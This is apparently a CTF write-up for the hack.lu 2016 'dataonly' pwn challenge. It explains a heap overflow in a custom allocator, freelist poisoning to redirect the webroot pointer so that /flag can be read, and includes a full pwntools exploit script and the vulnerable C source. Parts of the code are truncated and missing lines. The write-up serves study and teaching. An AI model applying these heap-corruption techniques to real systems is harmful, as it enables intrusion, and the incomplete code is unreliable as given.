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[hack.lu, 2016]

category: pwn

by f0rki

  • Category: Exploiting
  • Points: 200
  • Description:

Cthulhu is too chaotic and has lost the machine with his files. Cthulhu still has an old fileserver running on it though... Get the flag from /flag in the filesystem.

Connect to cthulhu.fluxfingers.net:1509.




$ ls -R dataonly_release/
cfi.asm  compile.sh*  launch*  launch.c  main.c  public/  server*  server.c


So basically server is just the tcp server. On each connection it will fork and exec the launch binary. launch is built from launch.c and main.c. launch.c contains the main function and does some setup, then control is passed to the DO_app_main function from main.c and that's where all the intersting code is.

If we take a look at compile.sh, we can see that the generated asm code of main.c is processed so that it uses a unnamed temporary file at fd 3 as a call stack. So we cannot modify return addresses. Furthermore main.c is completely self-contained. It doesn't call any dynamically linked functions. So attacking via the GOT is also infeasible. The challenge name already hints and the way the binary is built pretty much confirms that we will have to perform an attack without hijacking the control flow.

The heap implementation

Since main.c is completely self-contained it also includes standard functions that are normally provided by the libc of the system. The usual string processing and read/write function are there and also most interestingly a heap implementation:

  • In the beginning 10MB of heap space are mmaped
  • There are 9 different sizes of allocated chunks.
  • For each size a single-linked freelist is maintained, with the head of the list stored in malloc_freelist_heads[idx].
  • An allocated chunk looks like [ idx | memory ] where idx is a byte containing the index into the freelist array. From idx one can derive the size of the chunk with (1 << (idx + 4)).
  • A freed chunk loks like [ ptr | memory ], where ptr is a pointer to the next free chunk in the freelist or NULL if it's the last one.
  • DO_malloc tries to return the head of the freelist and only if the current freelist head for that particular size is NULL it will create a new chunk at malloc_next_alloc.
  • We can allocate a maximum of 0x1fff bytes, otherwise malloc will fail hard in DO_chunk_idx_by_len.

I calculated the sizes of the chunks and the interval of lengths for each of the possible idx values. I will call them bins further, because it kind of reminded me of the glibc fastbins.

[*] bin 0 len [0; 15] chunk size = 16
[*] bin 1 len [16; 31] chunk size = 32
[*] bin 2 len [32; 63] chunk size = 64
[*] bin 3 len [64; 127] chunk size = 128
[*] bin 4 len [128; 255] chunk size = 256
[*] bin 5 len [256; 511] chunk size = 512
[*] bin 6 len [512; 1023] chunk size = 1024
[*] bin 7 len [1024; 2047] chunk size = 2048
[*] bin 8 len [2048; 4095] chunk size = 4096
[*] bin 9 len [4096; 8191] chunk size = 8192

The relevant global variables for the heap management are:

void *malloc_freelist_heads[MALLOC_NR_OF_SIZES];
char *malloc_area_head;
char *malloc_next_alloc;
size_t malloc_area_size = 10 * 4096 * 4096; // 10MB of heap are enough for everyone
#define CHUNK_SIZE_BY_IDX(idx) (1 << (idx + 4))

A heap-based buffer overflow

There is a rather obvious buffer overflow in DO_readline. It allocates the largest possible buffer and then reads into this buffer byte by byte from stdin until it encounters a newline. It fails to check whether this goes out of bounds of the allocated buffer.

char *DO_readline(size_t *outlen) {
  size_t len = CHUNK_SIZE_BY_IDX(MALLOC_NR_OF_SIZES-1) - 1;
  char *buf = DO_malloc(len);
  char *p = buf;
  while (1) {
    *p = DO_readbyte();
    if (*p == '\n') {
      *p = '\0';
      if (outlen)
        *outlen = p - buf;
  return buf;

So we have a heap based buffer overflow. In modern heap implementations there are certain integrity checks on the metadata of heap objects, so this kind of vulnerability would be hard or maybe even impossible to exploit with for example the glibc heap. Fortunately this is not the case for this challenge :)

A dataonly way to /flag

So according to the description our goal is to read /flag. This means we have to somehow manipulate the DO_send_file function, so that it opens a file outside of the webroot directory. We can see that this is set to ./public/ by default. Yes they checked for path traversal ;)

We can achieve this if we can set the webroot pointer or overwrite the contents of the string webroot points to. In the end we did overwrite webroot and set it to point to an empty string. Then we can send full paths to the get command. Since the only vulnerability we spotted is the linear heap based buffer overflow we probably have to abuse the heap implementation somehow, otherwise we won't be able to reach the global variables.

Interacting with the Heap

Let's see how we can interact with the binary:

get: receive a file - send path on a separate line
language: set language - send name of new language on a separate line
help: show this help
quit: let the server terminate the connection
command understood, please send a path
<!DOCTYPE html>
    <title>Hello World!</title>
    Hello World!

So the two relevant commands are get and language. Let's see how they work in terms of the heap.

While performing get index.html the heap looks like this at the end of send_file:

legend: [pseudo-addr: | (u8 idx | u64 freelist ptr ) | (data | variable name) ]
[0x1: | 9 | command ]
[0x2: | 9 | path ]
[0x3: | 1 | "./public/index.html ]
[0x4: | 8 | tmp ]

then everything is freed and we have the following free lists:

2: [3]
5: [4]
9: [1, 2]

Note that we can control the size of the third allocation by sending a longer path.

      if (DO_streq(command, "get")) {
        DO_write("command understood, please send a path\n");
        char *path = DO_readline(NULL);
void DO_send_file(char *path) {
  size_t root_len = DO_strlen(webroot);
  size_t path_len = DO_strlen(path);
  for (int i=0; i<(long)path_len - 1; i++) {
    if (path[i] == '.' && path[i+1] == '.') {
      DO_write("would be kinda lame if that worked...\n");
  char *full_path = DO_malloc(root_len + path_len + 1);
  DO_memcpy(full_path, webroot, root_len);
  DO_memcpy(full_path + root_len, path, path_len + 1);
  int fd = DO_sys_open(full_path);
  if (fd < 0) {
    DO_write("unable to open file\n");
  } else {
    char *tmp = DO_malloc(4095);
    while (1) {
      long res = DO_sys_read(fd, tmp, 4095);
      if (res <= 0)
      DO_sys_write(STDOUT_FD, tmp, res);

When we perform language german as a first command, we have:

[0x1: | 9 | command ]
[0x2: | 9 | new_language ]
[0x3: | 0 | "german" ]

Note that the third allocation is not freed, because a reference is kept in the language global variable. So only in the freelist for bin 9 we have the command and new language buffer:

9: [1, 2]
void DO_set_language(void) {
  language = NULL;
  size_t linelen;
  char *new_language = DO_readline(&linelen);
  if (*new_language) {
    // save memory
    language = DO_malloc(linelen+1);
    DO_memcpy(language, new_language, linelen + 1);

Note that

  • We can overflow every call to DO_readline(NULL)
    • overflow the command buffer
    • overflow the path buffer via get command
  • We cannot overflow DO_readline(&linelen) in DO_set_language because this will be used as malloc param later and this will fail hard (because of malloc size limit)

Exploitation Attempt 1

  1. Perform language command and set to X
    [0x1: | 0x2 | ... ]
    [0x2: | 0x0 | ... ]
    [0x3: | 0 | "X" ]

    The freelist for bin 9 is [0x1, 0x2]
  2. Send invalid command overflow into 0x2
    [0x1: | 9 | AAAAAAAA... ]
    [0x2: | (&webroot-1) | ... ]
    [0x3: | 0 | "X" ]
  3. Perform language command and set to X, this triggers a malloc of the chunk at 0x2, which will write the fake freelist pointer into the freelist of bin 9.
    [0x1: | 9 | command ]
    [0x2: | 9 | language ]
    [0x3: | 0 | "X" ]

    after freeing everything the freelist for bin 9 is
    [0x1, 0x2, (&webroot-1)]

No if we trigger 3 allocations in bin 9, we get back the address of webroot (which isn't affected by ASLR btw.). We need to subtract 1, because malloc reserves the one byte for the idx value in front of the chunk.

So we can trigger this third allocation by supplying a language string that's at least 4096 bytes long. We can do this and overwrite the webroot pointer. Unfortunately then the program then segfaults when it tries to write past the webroot pointer somwhere into unmapped memory. Well seems like this needs more trickery.

Exploitation attempt 2

OK so we need to write less data at webroot. One way to write less data is to abuse the DO_send_file funciton. If we can trick malloc to return a pointer of our choice in line 201 of main.c then it will copy "./public/{whatever}" at this location. We can freely control the {whatever} part, since that's the parameter to get.

OK so we need to put the &webroot pointer somewhere in one of the first couple of bins, so that we can write less memory. Optimal would be the 0 bin.

Let's walk through the final exploit:

  1. First perform get index.html, this
    1. puts a chunk into the freelist of bin 8, so that we can safely perform get again, even if we messed up the malloc_next_alloc pointer.
    2. puts a chunk into the freelist of bin 1, which was allocated for the full_path, which is "./public/index.html"

    State of the heap at the end is:
    [0x1: | 0x2 | ... ] <- heads[9]
    [0x2: | NULL | ... ]
    [0x3: | NULL | ... ] <- heads[1]
    [0x4: | NULL | ... ] <- heads[8]
  2. Overflow heap with an invalid command, keep chunk at 0x2 intact and manipulate freelist pointer in chunk at 0x3
    [0x1: | 9 | AAAAAAAA.... ]
    [0x2: | \x00\x00\x00\x00 | AAAAAA... ] <- heads[9]
    [0x3: | addr | ... ] <- heads[1]
    [0x4: | NULL | ... ] <- heads[8]
  3. Trigger allocation in bin 1 with the language command
    [0x1: | 9 | command: "language"]
    [0x2: | 9 | new_language: "Y" * 16 ]
    [0x3: | 2 | language: "Y" * 16 ]
    [0x4: | NULL | ... ] <- heads[8]

    This will write addr to the top of the freelist of bin 1 and the chunk at 0x3 stays allocated, i.e. heads[1] == addr.
    We chose addr to be something we can later use to manipulate the freelist heads. We computed addr in the following way:
    webroot = "./public/"
    # the address we want to write to malloc_freelist_heads[0]
    w_real_addr = p64(velf.symbols['webroot'] - 1)
    # the padding we need so that this is allocated in bin 1
    w_addr_pad = "X" * (16 - strlen(w_real_addr))
    w_addr =  w_addr_pad + w_real_addr
    # we want to write to malloc_freelist_heads[0]
    addr = velf.symbols["malloc_freelist_heads"]
    addr -= len(webroot)   # get first copies "./public/"
    addr -= len(w_addr_pad)  # padding to allocate in bin 1
    addr -= 1  # malloc returns ptr+1

    Sothe next allocation in bin 1 will return a pointer that we can use to manipulate the actual freelist headers.
  4. Perform get command to corrupt the freelist heads

    so the freelist head of bin 0 now is &webroot - 1.
  5. Use language command to manipulate the webroot global variable. Allocating in bin 0, will now return the desired address.
    vp.sendline(p64(0x004014a2))  # just one of the pointers to a NULL byte
  6. get /flag. Unfortunately by now the freelist head of bin 0 is fubar. So we cannot just send /flag because then full_path will be allocated in bin 0 in. This means we have to allocate in another bin. We allocated in bin 1 by prepending a couple of '/' chars.
    vp.sendline("/" * (16 - 4) + "flag")
  7. read and submit flag :)

For reference, the full exploit script is this:

#!/usr/bin/env python
from pwn import *
def strlen(x):
    i = 0
    for c in x:
        if c == "\x00":
        i += 1
    return i
chunk_size_by_idx = lambda idx: (1 << (idx + 4))
def chunk_idx_by_len(length):
     ci = 0
     while chunk_size_by_idx(ci) < length:
         ci += 1
     return ci
bins = [[0x2000, 0, chunk_size_by_idx(k)] for k in range(10)]
for i in range(0x2000):
    idx = chunk_idx_by_len(i + 1)
    if i < bins[idx][0]:
        bins[idx][0] = i
    if i > bins[idx][1]:
        bins[idx][1] = i
# for b, (min_, max_, size) in enumerate(bins):
#     log.info("bin {} len [{}; {}] chunk size = {}".format(b, min_, max_, size))
velf = ELF("./launch")
# dealarm the binary for debugging
webroot = "./public/"
index = "index.html"
# vp = process(['./mlaunch', webroot])  # with alarm noped out
# gdb.attach(vp, execute="""
# init-peda
# break main.c:276
# break main.c:231
# break main.c:201
# """)
vp = remote("cthulhu.fluxfingers.net", 1509)
context.log_level = 'debug'
w_real_addr = p64(velf.symbols['webroot'] - 1)
w_addr_pad = "X" * (bins[1][0] - strlen(w_real_addr))
w_addr =  w_addr_pad + w_real_addr
addr = velf.symbols["malloc_freelist_heads"] - len(webroot) - len(w_addr_pad)
addr -= 1
for _ in range(9):
pl = "A" * bins[9][1]
pl += "\x00" * bins[9][2]
pl += p64(addr)
if "\n" in pl:
    log.warn("newline in payload!\n" + hexdump(pl))
log.info("triggering heap overflow")
vp.sendline("Y" * bins[1][0])  # allocate in bin 1, free(NULL)
# top of freelist[1] is now addr
vp.sendline(p64(0x004014a2))  # just a pointer to a NULL byte
vp.sendline("/" * (bins[1][0] - 4) + "flag")

and also the main.c source code

#include <x86_64-linux-gnu/asm/unistd_64.h>
#include <asm-generic/mman-common.h>
#include <asm-generic/fcntl.h>
#define size_t unsigned long
#define NULL ((void*)0)
#define false 0
#define true 1
#define bool int
#define STDIN_FD 0
#define STDOUT_FD 1
#define STACK_FD 3
/* syscall wrapper, accepts up to 5 arguments after the syscall number */
extern long DO_syscall(int syscall, ...);
/* ==== syscalls and important low-level stuff ==== */
void DO_fatal(char *str);
long DO_sys_read(int fd, char *buf, size_t len) {
  if (fd == STACK_FD)
    DO_fatal("error: bad fd passed to DO_sys_read\n");
  return DO_syscall(__NR_read, fd, buf, len);
long DO_sys_write(int fd, char *buf, size_t len) {
  if (fd == STACK_FD)
    DO_fatal("error: bad fd passed to DO_sys_write\n");
  return DO_syscall(__NR_write, fd, buf, len);
void *DO_mmap(size_t length) {
  // TODO add arg6 and properly zero it
  void *res = (void*)DO_syscall(__NR_mmap, NULL, length, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0);
  if ((unsigned long)res > (unsigned long)-4096)
    DO_fatal("error: mmap failed\n");
  return res;
void DO_sys_exit_group(int status) {
  DO_syscall(__NR_exit_group, status);
void DO_exit(int status) {
  while (1) DO_sys_exit_group(status);
size_t DO_strlen(char *str) {
  size_t res = 0;
  while (*str != '\0') {
  return res;
void DO_write(char *str) {
  DO_sys_write(STDOUT_FD, str, DO_strlen(str));
void DO_fatal(char *str) {
void DO_memcpy(void *dst, void *src, size_t len) {
  char *dst_ = dst;
  char *src_ = src;
  while (len--)
    *(dst_++) = *(src_++);
bool DO_streq(char *a, char *b) {
  while (1) {
    if (*a != *b)
      return false;
    if (*a == '\0')
      return true;
int DO_sys_open(char *path) {
  int res = DO_syscall(__NR_open, path, O_RDONLY);
  return res;
void DO_sys_close(int fd) {
  if (fd == STACK_FD)
    DO_fatal("error: tried to close STACK_FD\n");
  DO_syscall(__NR_close, fd);
/* ==== malloc ==== */
void *malloc_freelist_heads[MALLOC_NR_OF_SIZES];
char *malloc_area_head;
char *malloc_next_alloc;
size_t malloc_area_size = 10 * 4096 * 4096; // 10MB of heap are enough for everyone
void DO_setup_malloc(void) {
  malloc_area_head = DO_mmap(malloc_area_size);
  malloc_next_alloc = malloc_area_head;
#define CHUNK_SIZE_BY_IDX(idx) (1 << (idx + 4))
size_t DO_chunk_size_by_idx(int idx) {
  if (idx < 0 || idx > MALLOC_NR_OF_SIZES - 1)
    DO_fatal("error: bad chunk size idx");
  return CHUNK_SIZE_BY_IDX(idx);
int DO_chunk_idx_by_len(size_t len) {
    DO_fatal("error: too big for malloc\n");
  int chunk_idx = 0;
  while (CHUNK_SIZE_BY_IDX(chunk_idx) < len)
  return chunk_idx;
void *DO_malloc(size_t len) {
  if ((long)len == -1)
    DO_fatal("error: absurdly huge memory allocation\n");
  int idx = DO_chunk_idx_by_len(len);
  char *res = malloc_freelist_heads[idx];
  if (res == NULL) {
    len = DO_chunk_size_by_idx(idx);
    if (malloc_area_size - (malloc_next_alloc - malloc_area_head) <= len)
      DO_fatal("error: out of heap space\n");
    res = malloc_next_alloc;
    malloc_next_alloc += len;
  } else {
    malloc_freelist_heads[idx] = *(void**)res;
  res[0] = idx;
  return res + 1;
void DO_free(void *ptr) {
  if (ptr == NULL)
  ptr = ((char*)ptr)-1;
  int idx = *(char*)ptr;
  *(void**)ptr = malloc_freelist_heads[idx];
  malloc_freelist_heads[idx] = ptr;
/* ==== application code ==== */
char *webroot;
char *language;
char DO_readbyte(void) {
  char c;
  long res = DO_sys_read(STDIN_FD, &c, 1);
  if (res == 0)
  if (res != 1)
    DO_fatal("error: read failed\n");
  return c;
char *DO_readline(size_t *outlen) {
  size_t len = CHUNK_SIZE_BY_IDX(MALLOC_NR_OF_SIZES-1) - 1;
  char *buf = DO_malloc(len);
  char *p = buf;
  while (1) {
    *p = DO_readbyte();
    if (*p == '\n') {
      *p = '\0';
      if (outlen)
        *outlen = p - buf;
  return buf;
void DO_send_file(char *path) {
  size_t root_len = DO_strlen(webroot);
  size_t path_len = DO_strlen(path);
  for (int i=0; i<(long)path_len - 1; i++) {
    if (path[i] == '.' && path[i+1] == '.') {
      DO_write("would be kinda lame if that worked...\n");
  char *full_path = DO_malloc(root_len + path_len + 1);
  DO_memcpy(full_path, webroot, root_len);
  DO_memcpy(full_path + root_len, path, path_len + 1);
  int fd = DO_sys_open(full_path);
  if (fd < 0) {
    DO_write("unable to open file\n");
  } else {
    char *tmp = DO_malloc(4095);
    while (1) {
      long res = DO_sys_read(fd, tmp, 4095);
      if (res <= 0)
      DO_sys_write(STDOUT_FD, tmp, res);
void DO_set_language(void) {
  language = NULL;
  size_t linelen;
  char *new_language = DO_readline(&linelen);
  if (*new_language) {
    // save memory
    language = DO_malloc(linelen+1);
    DO_memcpy(language, new_language, linelen + 1);
void DO_app_main(char *webroot_) {
  webroot = webroot_;
  while (1) {
    char *command = DO_readline(NULL);
    if (language != NULL && DO_streq(language, "german")) {
      if (DO_streq(command, "hole")) {
        DO_write("kommando verstanden, bitte pfad senden\n");
        char *path = DO_readline(NULL);
      } else if (DO_streq(command, "sprache")) {
      } else if (DO_streq(command, "hilfe")) {
        DO_write("hole: hole datei - sende pfad in neuer zeile\n");
        DO_write("sprache: sprache aendern - sende name der sprache in neuer zeile\n");
        DO_write("hilfe: zeige diese hilfe\n");
        DO_write("ende: verbindung schliessen\n");
      } else if (DO_streq(command, "ende")) {
      } else {
        DO_write("unbekanntes kommando - sende \"hilfe\" für hilfe\n");
    } else { // must be english
      if (DO_streq(command, "get")) {
        DO_write("command understood, please send a path\n");
        char *path = DO_readline(NULL);
      } else if (DO_streq(command, "language")) {
      } else if (DO_streq(command, "help")) {
        DO_write("get: receive a file - send path on a separate line\n");
        DO_write("language: set language - send name of new language on a separate line\n");
        DO_write("help: show this help\n");
        DO_write("quit: let the server terminate the connection\n");
      } else if (DO_streq(command, "quit")) {
      } else {
        DO_write("bad command - try sending \"help\" for help\n");
/writeups/ $
